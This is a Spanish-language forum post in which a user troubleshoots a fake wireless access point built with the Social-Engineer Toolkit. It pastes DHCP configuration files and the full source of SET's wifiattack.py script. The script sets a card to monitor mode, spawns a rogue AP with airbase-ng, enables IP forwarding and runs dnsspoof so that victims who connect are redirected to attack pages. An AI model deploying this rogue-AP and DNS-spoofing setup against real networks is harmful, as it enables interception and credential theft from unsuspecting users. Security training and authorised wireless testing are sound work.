Título: SET - Wireless Access Point Attack Vector
Publicado por: Cr4id3r en 18 Abril 2013, 22:50 pm
Hola, buenas a todos chicos, veran tengo un pequeño problemilla creando mi AP, la cosa es que inicio el servicio correctamente, puedo ver perfectamente la red, pero a la hora de conectarme con un equipo este se queda intentando establecer la conexión pero de eso no pasa, estas son las configuraciones que tengo: dhcpd.conf# # Sample configuration file for ISC dhcpd for Debian # #
# The ddns-updates-style parameter controls whether or not the server will # attempt to do a DNS update when a lease is confirmed. We default to the # behavior of the version 2 packages ('none', since DHCP v2 didn't # have support for DDNS.) ddns-update-style none;
# option definitions common to all supported networks... option domain-name "example.org"; option domain-name-servers ns1.example.org, ns2.example.org;
default-lease-time 600; max-lease-time 7200;
# If this DHCP server is the official DHCP server for the local # network, the authoritative directive should be uncommented. authoritative;
# Use this to send dhcp log messages to a different log file (you also # have to hack syslog.conf to complete the redirection). log-facility local7;
# No service will be given on this subnet, but declaring it helps the # DHCP server to understand the network topology.
subnet 192.168.1.0 netmask 255.255.255.0 { option domain-name "mylan"; option domain-name-servers 192.168.1.1; option routers 192.168.1.1; option subnet-mask 255.255.255.0; range 192.168.1.100 192.168.1.200; }
# This is a very basic subnet declaration.
#subnet 10.254.239.0 netmask 255.255.255.224 { # range 10.254.239.10 10.254.239.20; # option routers rtr-239-0-1.example.org, rtr-239-0-2.example.org; #}
# This declaration allows BOOTP clients to get dynamic addresses, # which we don't really recommend.
#subnet 10.254.239.32 netmask 255.255.255.224 { # range dynamic-bootp 10.254.239.40 10.254.239.60; # option broadcast-address 10.254.239.31; # option routers rtr-239-32-1.example.org; #}
# A slightly different configuration for an internal subnet. #subnet 10.5.5.0 netmask 255.255.255.224 { # range 10.5.5.26 10.5.5.30; # option domain-name-servers ns1.internal.example.org; # option domain-name "internal.example.org"; # option routers 10.5.5.1; # option broadcast-address 10.5.5.31; # default-lease-time 600; # max-lease-time 7200; #}
# Hosts which require special configuration options can be listed in # host statements. If no address is specified, the address will be # allocated dynamically (if possible), but the host-specific information # will still come from the host declaration.
#host passacaglia { # hardware ethernet 0:0:c0:5d:bd:95; # filename "vmunix.passacaglia"; # server-name "toccata.fugue.com"; #}
# Fixed IP addresses can also be specified for hosts. These addresses # should not also be listed as being available for dynamic assignment. # Hosts for which fixed IP addresses have been specified can boot using # BOOTP or DHCP. Hosts for which no fixed address is specified can only # be booted with DHCP, unless there is an address range on the subnet # to which a BOOTP client is connected which has the dynamic-bootp flag # set. #host fantasia { # hardware ethernet 08:00:07:26:c0:a5; # fixed-address fantasia.fugue.com; #}
# You can declare a class of clients and then do address allocation # based on that. The example below shows a case where all clients # in a certain class get addresses on the 10.17.224/24 subnet, and all # other clients get addresses on the 10.0.29/24 subnet.
#class "foo" { # match if substring (option vendor-class-identifier, 0, 4) = "SUNW"; #}
#shared-network 224-29 { # subnet 10.17.224.0 netmask 255.255.255.0 { # option routers rtr-224.example.org; # } # subnet 10.0.29.0 netmask 255.255.255.0 { # option routers rtr-29.example.org; # } # pool { # allow members of "foo"; # range 10.17.224.10 10.17.224.250; # } # pool { # deny members of "foo"; # range 10.0.29.10 10.0.29.230; # } #}
isc-dhcp-server# Defaults for isc-dhcp-server initscript # sourced by /etc/init.d/isc-dhcp-server # installed at /etc/default/isc-dhcp-server by the maintainer scripts
# # This is a POSIX shell fragment #
# Path to dhcpd's config file (default: /etc/dhcp/dhcpd.conf). #DHCPD_CONF=/etc/dhcp/dhcpd.conf
# Path to dhcpd's PID file (default: /var/run/dhcpd.pid). #DHCPD_PID=/var/run/dhcpd.pid
# Additional options to start dhcpd with. # Don't use options -cf or -pf here; use DHCPD_CONF/ DHCPD_PID instead #OPTIONS=""
# On what interfaces should the DHCP server (dhcpd) serve DHCP requests? # Separate multiple interfaces with spaces, e.g. "eth0 eth1". INTERFACES="wlan0 mon0"
wifiattack.py#!/usr/bin/env python ############################################## # # This is a basic setup for an access point # attack vector in set. # ##############################################
import sys import os import subprocess import re import pexpect import time from src.core.setcore import * from src.core.menu import text from config.set_config import AIRBASE_NG_PATH as airbase_path from config.set_config import ACCESS_POINT_SSID as access_point from config.set_config import AP_CHANNEL as ap_channel from config.set_config import DNSSPOOF_PATH as dnsspoof_path
if not os.path.isfile(dnsspoof_path): print_warning("DNSSpoof was not found. Please install or correct path in set_config. Exiting....") exit_set()
if not os.path.isfile(airbase_path): airbase_path = "src/wireless/airbase-ng" print_info("using SET's local airbase-ng binary")
print_info("For this attack to work properly, we must edit the dhcp3-server file to include our wireless interface.") print_info("""This will allow dhcp3 to properly assign IPs. (INTERFACES="at0")""") print("") print_status("SET will now launch nano to edit the file.") print_status("Press ^X to exit nano and don't forget to save the updated file!") print_warning("If you receive an empty file in nano, please check the path of your dhcp3-server file!") return_continue() subprocess.Popen("nano /etc/dhcp/dhcpd.conf", shell=True).wait()
# DHCP SERVER CONFIG HERE dhcp_config1 = (""" ddns-update-style none; authoritative; log-facility local7; subnet 10.0.0.0 netmask 255.255.255.0 { range 10.0.0.100 10.0.0.254; option domain-name-servers 8.8.8.8; option routers 10.0.0.1; option broadcast-address 10.0.0.255; default-lease-time 600; max-lease-time 7200; } """)
dhcp_config2 = (""" ddns-update-style none; authoritative; log-facility local7; subnet 192.168.1.0 netmask 255.255.255.0 { range 192.168.1.100 192.168.1.254; option domain-name-servers 8.8.8.8; option routers 192.168.1.1; option broadcast-address 192.168.1.255; default-lease-time 600; max-lease-time 7200; } """)
show_fakeap_dhcp_menu = create_menu(text.fakeap_dhcp_text, text.fakeap_dhcp_menu) fakeap_dhcp_menu_choice = raw_input(setprompt(["8"], ""))
if fakeap_dhcp_menu_choice != "": fakeap_dhcp_menu_choice = check_length(fakeap_dhcp_menu_choice,2) # convert it to a string fakeap_dhcp_menu_choice = str(fakeap_dhcp_menu_choice)
if fakeap_dhcp_menu_choice == "": fakeap_dhcp_menu_choice = "1"
if fakeap_dhcp_menu_choice == "1": # writes the dhcp server out print_status("Writing the dhcp configuration file to src/program_junk") filewrite=file("src/program_junk/dhcp.conf", "w") filewrite.write(dhcp_config1) # close the file filewrite.close() dhcptun = 1
if fakeap_dhcp_menu_choice == "2": # writes the dhcp server out print_status("Writing the dhcp configuration file to src/program_junk") filewrite=file("src/program_junk/dhcp.conf", "w") filewrite.write(dhcp_config2) # close the file filewrite.close() dhcptun = 2
if fakeap_dhcp_menu_choice == "exit": exit_set()
interface = raw_input(setprompt(["8"], "Enter the wireless network interface (ex. wlan0)"))
# place wifi interface into monitor mode print_status("Placing card in monitor mode via airmon-ng..")
# if we have it already installed then don't use the SET one if os.path.isfile("/usr/local/sbin/airmon-ng"): airmonng_path = "/usr/local/sbin/airmon-ng"
if not os.path.isfile("/usr/local/sbin/airmon-ng"): airmonng_path = "src/wireless/airmon-ng"
monproc = subprocess.Popen("%s start %s | grep \"monitor mode enabled on\" | cut -d\" \" -f5 | sed -e \'s/)$//\'" % (airmonng_path,interface), shell=True, stdout=subprocess.PIPE) moniface=monproc.stdout.read() monproc.wait()
# execute modprobe tun subprocess.Popen("modprobe tun", shell=True).wait()
# create a fake access point print_status("Spawning airbase-ng in a seperate child thread...") child = pexpect.spawn('%s -P -C 20 -e "%s" -c %s %s' % (airbase_path,access_point,ap_channel,moniface)) print_info("Sleeping 15 seconds waiting for airbase-ng to complete...") time.sleep(15)
# bring the interface up if dhcptun==1: print_status("Bringing up the access point interface...") subprocess.Popen("ifconfig at0 up", shell=True).wait() subprocess.Popen("ifconfig at0 10.0.0.1 netmask 255.255.255.0", shell=True).wait() subprocess.Popen("ifconfig at0 mtu 1400", shell=True).wait() subprocess.Popen("route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1", shell=True).wait()
if dhcptun==2: print_status("Bringing up the access point interface...") subprocess.Popen("ifconfig at0 up", shell=True).wait() subprocess.Popen("ifconfig at0 192.168.1.1 netmask 255.255.255.0", shell=True).wait() subprocess.Popen("ifconfig at0 mtu 1400", shell=True).wait() subprocess.Popen("route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1", shell=True).wait()
# starts a dhcp server print_status("Starting the DHCP server on a seperate child thread...") child2 = pexpect.spawn("/etc/init.d/isc-dhcp-server -cf src/program_junk/dhcp.conf at0")
# starts ip_forwarding print_status("Starting IP Forwarding...") child3 = pexpect.spawn("echo 1 > /proc/sys/net/ipv4/ip_forward")
# start dnsspoof print_status("Starting DNSSpoof in a seperate child thread...") child4 = pexpect.spawn("%s -i at0" % (dnsspoof_path))
print_status("SET has finished creating the attack. If you experienced issues please report them.") print_status("Now launch SET attack vectors within the menus and have a victim connect via wireless.") print_status("Be sure to come back to this menu to stop the services once your finished.") return_continue()
|